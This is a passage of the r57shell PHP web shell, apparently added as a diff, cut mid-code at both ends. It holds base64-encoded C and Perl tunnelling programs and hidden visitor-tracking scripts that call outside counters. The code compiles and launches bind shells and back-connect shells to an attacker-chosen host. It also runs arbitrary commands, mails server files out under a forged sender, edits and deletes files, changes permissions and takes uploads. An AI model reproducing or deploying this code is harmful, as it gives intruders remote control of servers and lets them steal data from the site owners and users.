+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm 
+lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW 
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv 
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." 
<a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; 
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' 
)'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' 
-name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." 
&"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." 
&"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + 